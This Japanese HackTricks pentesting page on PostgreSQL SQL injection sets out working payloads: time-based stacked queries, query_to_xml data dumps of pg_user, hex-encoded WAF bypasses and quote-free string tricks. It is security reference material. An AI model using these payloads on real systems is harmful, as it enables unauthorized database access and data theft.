# PostgreSQLインジェクション

{{#include ../../../banners/hacktricks-training.md}}

---

**このページは、PostgreSQLデータベースで見つかったSQLインジェクションを悪用するためのさまざまなトリックを説明し、** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) **で見つけることができるトリックを補完することを目的としています。**

## ネットワークインタラクション - 権限昇格、ポートスキャナー、NTLMチャレンジレスポンス開示 & エクスフィルトレーション

**PostgreSQLモジュール`dblink`**は、他のPostgreSQLインスタンスに接続し、TCP接続を実行する機能を提供します。これらの機能は、`COPY FROM`機能と組み合わせることで、権限昇格、ポートスキャン、NTLMチャレンジレスポンスのキャプチャなどのアクションを可能にします。これらの攻撃を実行する詳細な方法については、[これらの攻撃を実行する方法](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)を確認してください。

### **dblinkと大きなオブジェクトを使用したエクスフィルトレーションの例**

[**この例を読むことができます**](dblink-lo_import-data-exfiltration.md) **は、`dblink_connect`関数のユーザー名内に大きなオブジェクトの内容をロードし、その後エクスフィルトレーションする方法のCTF例です。**

## PostgreSQL攻撃: 読み取り/書き込み、RCE、権限昇格

ホストを侵害し、PostgreSQLから権限を昇格させる方法については、以下を確認してください:

{{#ref}}
../../../network-services-pentesting/pentesting-postgresql.md
{{#endref}}

## WAFバイパス

### PostgreSQL文字列関数

文字列を操作することで、**WAFやその他の制限をバイパスするのに役立ちます**。\
[**このページでは**](https://www.postgresqltutorial.com/postgresql-string-functions/)**いくつかの便利な文字列関数を見つけることができます。**

### スタッククエリ

PostgreSQLはスタッククエリをサポートしていますが、2つの応答が返されるとエラーをスローするアプリケーションがいくつかあります。ただし、時間インジェクションを介してスタッククエリを悪用することはまだ可能です:
```
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
```
### XMLトリック

**query_to_xml**

この関数は、すべてのデータをXML形式で1つのファイルに返します。大量のデータを1行でダンプしたい場合に最適です。
```sql
SELECT query_to_xml('select * from pg_user',true,true,'');
```
**database_to_xml**

この関数は、データベース全体をXML形式で1行にダンプします（データベースが非常に大きい場合は注意してください。DoS攻撃を引き起こす可能性がありますし、自分のクライアントにも影響を与える可能性があります）：
```sql
SELECT database_to_xml(true,true,'');
```
### Hexの文字列

**クエリ**を**文字列内**で実行できる場合（例えば、**`query_to_xml`**関数を使用する場合）。**この方法でフィルターをバイパスするために、文字列を16進数として渡すためにconvert_fromを使用できます:**
```sql
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
```
### 禁止された引用符

ペイロードに引用符を使用できない場合、基本的な句のために `CHR` を使用してこれを回避できます（_文字の連結は、SELECT、INSERT、DELETEなどの基本的なクエリにのみ機能します。すべてのSQLステートメントには機能しません_）：
```
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
```
または `$` を使用します。このクエリは同じ結果を返します：
```
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
```
{{#include ../../../banners/hacktricks-training.md}}